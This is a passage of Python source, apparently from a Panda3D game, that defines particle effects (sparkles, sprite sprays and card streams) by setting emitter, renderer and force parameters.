    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(1)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(3.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/buzzwords-crash")
    # Rendered black (texture silhouetted).
    p0.renderer.setColor(Vec4(0.00, 0.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(1.0)
    p0.renderer.setFinalXScale(1.8)
    p0.renderer.setInitialYScale(0.5)
    p0.renderer.setFinalYScale(0.9)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(8.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 7.0000, -1.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.0010)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(19.5449, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def powertrip(self):
    """Short-lived green sparkles that balloon outward ("power trip").

    Resets this effect in place, then attaches one SparkleParticleRenderer
    system (birth radius 0.1 growing to a huge death radius of 15 over a
    0.25s lifespan) and a ForceGroup stacking a sink force, a zero-vector
    force, and a jitter force.
    """
    self.reset()
    self.setPos(-2.000, 2.500, 2.200)
    self.setHpr(-90.000, 0.000, 0.000)
    self.setScale(4.800, 4.800, 4.800)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.0800)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.2500)
    p0.factory.setLifespanSpread(0.050)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
    p0.renderer.setEdgeColor(Vec4(0, 0, 0, 1.00))
    p0.renderer.setBirthRadius(0.1000)
    p0.renderer.setDeathRadius(15.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(2.4000)
    p0.emitter.setAmplitudeSpread(1.1000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.120)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(10.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    force0.setActive(1)
    f0.addForce(force0)
    # NOTE(review): force1 is a zero vector, so it contributes nothing;
    # kept as authored in case it is a placeholder tuned elsewhere.
    force1 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    force2 = LinearJitterForce(4.5449, 0)
    force2.setActive(1)
    f0.addForce(force2)
    self.addForceGroup(f0)
@particle
def spinEffect(self):
    """Red snow-particle swirl used as a spin/dizzy indicator.

    Resets this effect in place (note: no setPos/setHpr here — only a
    small uniform scale), then attaches one red-tinted sprite system
    radiating from a sphere volume, and a ForceGroup combining a sink
    force and a jitter force to swirl the particles.
    """
    self.reset()
    self.setScale(0.040, 0.040, 0.040)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(6)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.3000)
    p0.factory.setLifespanSpread(0.3000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    # Snow texture tinted red.
    p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.05)
    p0.renderer.setFinalXScale(0.05)
    p0.renderer.setInitialYScale(0.05)
    p0.renderer.setFinalYScale(0.05)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    # Amplitude expressed as base * tweak factor, preserved as authored.
    p0.emitter.setAmplitude(4.000*1.2)
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitudeSpread(1.000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -4.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.300)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 1.2000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED,1.0000, 20, 1)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearJitterForce(5.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def restrainingOrderCloud(self):
    """Near-instant burst cloud of tiny "roll-o-dex" sprites.

    Resets this effect in place, then attaches one sprite system whose
    birth rate (0.0001) with litter size == pool size (60) releases the
    entire pool at once — a one-shot puff of shrinking, fading sprites.
    No force group.
    """
    self.reset()
    self.setPos(0.000, 4.000, 3.000)
    self.setHpr(-180.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    #p0.setRenderer("PointParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.0001)
    p0.setLitterSize(60)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.02)
    p0.renderer.setFinalXScale(0.001)
    p0.renderer.setInitialYScale(0.02)
    p0.renderer.setFinalYScale(0.001)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -18.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.8900)
    self.addParticles(p0)
@particle
def numberSpill(self):
    """Build the 'number spill' effect: a slow trickle of black 'raindrop'
    sprites (litter 2±1 every 0.3 s) pulled downward by a strong
    LinearSinkForce below the emitter.
    """
    self.reset()
    self.setPos(0.900, 2.100, 1.90)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.100, 1.100, 1.100)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(6)
    p0.setBirthRate(0.3000)
    p0.setLitterSize(2)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(5.8000)
    p0.factory.setLifespanSpread(0.4000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
    p0.renderer.setColor(Vec4(0, 0, 0, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.2)
    p0.renderer.setFinalXScale(0.03)
    p0.renderer.setInitialYScale(0.3)
    p0.renderer.setFinalYScale(0.05)
    p0.renderer.setNonanimatedTheta(90.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(2.0000)
    p0.emitter.setAmplitudeSpread(1.300)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.3282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -33.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def headShrinkDrop(self):
    """Build the 'head shrink drop' effect: gold-centered sparkle
    particles emitted from a disc, with a mild jitter force group.
    """
    self.reset()
    self.setPos(0.000, 0.000, 7.500)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.000, 2.000, 2.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.1500)
    p0.setLitterSize(3)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.2000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
    p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
    p0.renderer.setBirthRadius(0.0400)
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(2.300)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 4.0000))
    # Disc parameters
    p0.emitter.setRadius(0.2800)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(0.060, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def rollodexWaterfall(self):
    """Build the 'rollodex waterfall' effect: 'rollodex-card' sprites
    radiating off a sphere surface; the 'forward' force group holds an
    inactive source force and an active sink force above the emitter.
    """
    self.reset()
    self.setPos(-0.160, 2.942, 3.400)
    self.setHpr(89.908, -20.000, 179.476)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereSurfaceEmitter")
    p0.setPoolSize(20)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(3)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(5.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.5000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.4)
    p0.renderer.setFinalXScale(0.4)
    p0.renderer.setInitialYScale(0.3)
    p0.renderer.setFinalYScale(0.3)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Surface parameters
    p0.emitter.setRadius(1.0000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forward')
    # Force parameters
    # NOTE(review): force0 is built but left inactive — kept as authored.
    force0 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
    force0.setActive(0)
    f0.addForce(force0)
    force1 = LinearSinkForce(Point3(0.0000, 0.0000, 10.0000), LinearDistanceForce.FTONEOVERRCUBED, 2.9550, 50.0000, 1)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def rollodexStream(self):
    """Build the 'rollodex stream' effect: 'rollodex-card' sprites fired
    explicitly along -X (negative amplitude on a +X launch vector) from a
    point emitter, with source and jitter forces in group 'forward'.
    """
    self.reset()
    self.setPos(0.107, 2.799, 3.400)
    self.setHpr(89.908, -20.000, 179.476)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("PointEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(2)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(5.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(3.0000)
    p0.factory.setMassSpread(2.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.4)
    p0.renderer.setFinalXScale(0.4)
    p0.renderer.setInitialYScale(0.3)
    p0.renderer.setFinalYScale(0.3)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
    p0.emitter.setAmplitude(-15.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Point parameters
    p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forward')
    # Force parameters
    force0 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearJitterForce(19.1346, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def shiftSpray(self):
    """Build the 'shift spray' effect: a dense stream of short-lived
    yellow sparkles from a line emitter, bent by a sink force well above
    the system (z = 96).
    """
    self.reset()
    self.setPos(0.000, 5.000, 2.300)
    self.setHpr(0.000, -55.000, 0.000)
    self.setScale(9.000, 9.000, 9.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("LineEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.100)
    p0.setLitterSize(7)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.3000)
    p0.factory.setLifespanSpread(0.1000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 0.00, 0.9))
    p0.renderer.setEdgeColor(Vec4(1.00, 1.00, 0.00, 0.6))
    p0.renderer.setBirthRadius(0.0200)
    p0.renderer.setDeathRadius(0.0600)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    # NOTE(review): no line-endpoint calls here, unlike other LineEmitter
    # effects in this file — emitter presumably uses its defaults.
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.5000)
    p0.emitter.setAmplitudeSpread(0.5000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, 96.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def pixieDrop(self):
    """Build the 'pixie drop' effect: long-lived white/blue sparkles from
    a disc emitter, scattered by a jitter force.
    """
    self.reset()
    self.setPos(0.000, 0.000, 6.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.000, 2.000, 2.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(150)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(7)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(2.2000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.0400)
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 4.0000))
    # Disc parameters
    p0.emitter.setRadius(0.3000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(3.6003, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def hotAirSpray(self):
    """Build the 'hot air spray' effect: 'fire' sprites pushed out of a
    tiny sphere volume, shaped by a sink force and a constant -Y vector
    force.
    """
    self.reset()
    self.setPos(0.000, 2.500, 3.200) # originally (0,4,4)
    self.setHpr(-180.000, 80.000, -180.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(10)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.6000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.6)
    p0.renderer.setFinalXScale(0.3)
    p0.renderer.setInitialYScale(0.6)
    p0.renderer.setFinalYScale(0.3)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(2.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 5.1000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.0200)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearVectorForce(Vec3(0.0000, -10.0000, 0.0000), 1.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def resistanceEffectSparkle(self):
    """Build the 'resistance effect' sparkle burst: 500 sparkles launched
    at once (pool == litter == 500) from a sphere volume with a strong
    upward offset, then pulled down by a deep sink force (z = -79).
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(500)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(500)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(3.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.2000)
    p0.renderer.setDeathRadius(0.1000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPSCALE)
    # Emitter parameters
